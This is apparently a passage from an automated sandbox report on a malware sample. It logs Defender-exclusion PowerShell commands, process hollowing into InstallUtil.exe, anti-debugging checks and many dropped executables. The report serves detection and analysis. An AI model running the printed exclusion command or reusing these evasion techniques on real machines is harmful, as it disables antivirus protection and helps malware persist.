                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004173DD
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6A3DB1F7
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6A3DB66C
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A58AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6A58AC62
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -ForceJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Sample uses process hollowing technique
                        Source: C:\Users\user\Desktop\file.exeSection unmapped: unknown base address: 400000Jump to behavior
                        Searches for specific processes (likely to inject)
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,17_2_00415D00
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 105F008Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,14_2_00478504
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -ForceJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe "C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe "C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe "C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe "C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe "C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe "C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe c:\users\user\pictures\mx6oxfuxxljnkbd9f2dplyyc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe c:\users\user\pictures\51fuipaxuixvsfnlfylcdduf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe c:\users\user\pictures\8ang0kr81h7ichssfxxzspja.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe c:\users\user\pictures\mx6oxfuxxljnkbd9f2dplyyc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe c:\users\user\pictures\51fuipaxuixvsfnlfylcdduf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe c:\users\user\pictures\8ang0kr81h7ichssfxxzspja.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,14_2_0042E09C
                        Source: BroomSetup.exe, 00000014.00000002.3151972256.000000000041C000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: Shell_TrayWndSVW
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: k..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpBinary or memory string: ..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: [sk..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                        Source: BroomSetup.exe, 00000014.00000002.3151972256.000000000041C000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3DB341 cpuid 17_2_6A3DB341
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: GetLocaleInfoA,12_2_0040520C
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: GetLocaleInfoA,12_2_00405258
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: GetLocaleInfoA,14_2_00408568
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: GetLocaleInfoA,14_2_004085B4
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,17_2_00414570
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
